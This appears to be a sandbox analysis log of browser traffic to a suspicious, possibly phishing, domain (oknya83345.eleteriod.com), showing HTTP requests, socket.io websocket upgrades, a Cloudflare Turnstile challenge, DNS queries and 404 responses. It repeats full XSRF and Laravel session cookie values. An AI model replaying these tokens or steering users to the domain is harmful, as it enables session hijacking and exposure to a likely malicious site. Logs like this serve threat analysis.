laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /qrhxvaaCuXxcOYrCQYlWzLXpEpCeH8ghZociP8xffes67140 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /stFVFVBLRUZEe4WD3anWY2WwTjYsy9M2yanojV67aWExa5cPBbBIYHvasqNUwXwEuYef256 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /ef8d6X647wRncbASI7KK9wvH19moijIGgbX7RvbPNBqe0tonNY6Y78148 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /klTwjvYzK7ZnXdGU0MmXwR8cdFcuUR6piy8Hoa78168 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /wxGHOVhNfB9eJCYocFlGLnZU0vLUJmndqUTPYn2iQJMFdfQ8jFqkPab172 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /rsivy0f9LvMVoGwWXBY36UNQHJ5vLvLswbmHYZghDjaLx4bHrm3aZHETrLuA4WzXtVHef198 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /qrRiGIunRIlmWDy4XNHkLCd9QMHuvoWva5jMdSjLAZIB0oQFclwOKeg98a9tc1j6cd240 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /ghhzdSo0pCDRNfU983q6ExVmnoJ4rBpDRip5WrwOkA7XgKsbaoTE86uM12210 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: oknya83345.eleteriod.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://oknya83345.eleteriod.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3DSec-WebSocket-Key: PyHf1aJAyG0MljaciK7lZQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
        Source: global trafficHTTP traffic detected: GET /stFVFVBLRUZEe4WD3anWY2WwTjYsy9M2yanojV67aWExa5cPBbBIYHvasqNUwXwEuYef256 HTTP/1.1Host: oknya83345.eleteriod.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
        Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: oknya83345.eleteriod.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://oknya83345.eleteriod.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3DSec-WebSocket-Key: BDBIQpxrM/238w6jZTkiyg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
        Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: oknya83345.eleteriod.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://oknya83345.eleteriod.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3DSec-WebSocket-Key: Icg4jNYwaKCrdvuSJ4/omA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
        Source: global trafficDNS traffic detected: DNS query: oknya83345.eleteriod.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
        Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1078806175:1716390872:Qs3WyvFVlUI0IspEMP6EGCRsS1O73Ub7EXvElg-oaUk/887dff9f6d8f429d/4d20fcc93ec5b5c HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2674sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 4d20fcc93ec5b5csec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:56:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0ekmHGO7BUUglj6sVXOCa9jW07J8%2BxhGuG7Gv6MyDJybA0DboQ9jX0yG5TgYHIu5YEKn4thwxOiKUMkx%2FMexzmMCRwigRjh97ib6vpP%2B%2F%2BpdHyAcT0C3menqQZ3Rw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: MISSServer: cloudflareCF-RAY: 887dffadff6c42fd-EWR
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:56:56 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: SKwgNovi0b2aAxuaO25BeQ==$ZckC9pUdKIdj4/CNPnvNnQ==Server: cloudflareCF-RAY: 887dffc2e9ba1881-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:57:01 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: Zu3wBb91SGuEQJT2XJJedA==$tajMHqZownsZeRW9XyAzag==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 887dffe5cae71811-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:57:14 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: PHS4Cyw2njNC05ARGr8YAQ==$aGkT+2lUR7ywm8QThHLUOQ==Server: cloudflareCF-RAY: 887e0033bc9b4308-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:57:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXS%2F%2BieANR47Q1yL8VR8Dd97Yv%2F2mwF86UhkAFycDyPCRJ566JuDBDY2fDJoKBX%2FEJ8noq7eE%2BA1wZJPOPTXDz5tKGfyf1juXavJrwrgReidBDeYnuGD8CnEY0ebhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 887e0041dddc6a53-EWR
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:57:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ME%2BQrwNF3NtHlhechFOfhUiuBnLZZf%2BL60VhOpLbPDPN9C5OkNxLaIKRA504NsRbPloDcGj0RTQTxz09mBcr3EBE6nVAuc3jd%2FSkQieUhYjrHwKiBgcajF4Ykdtmpg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 887e007c1d5d1977-EWR
        Source: chromecache_110.2.drString found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
        Source: chromecache_140.2.drString found in binary or memory: https://cloud.google.com/contact
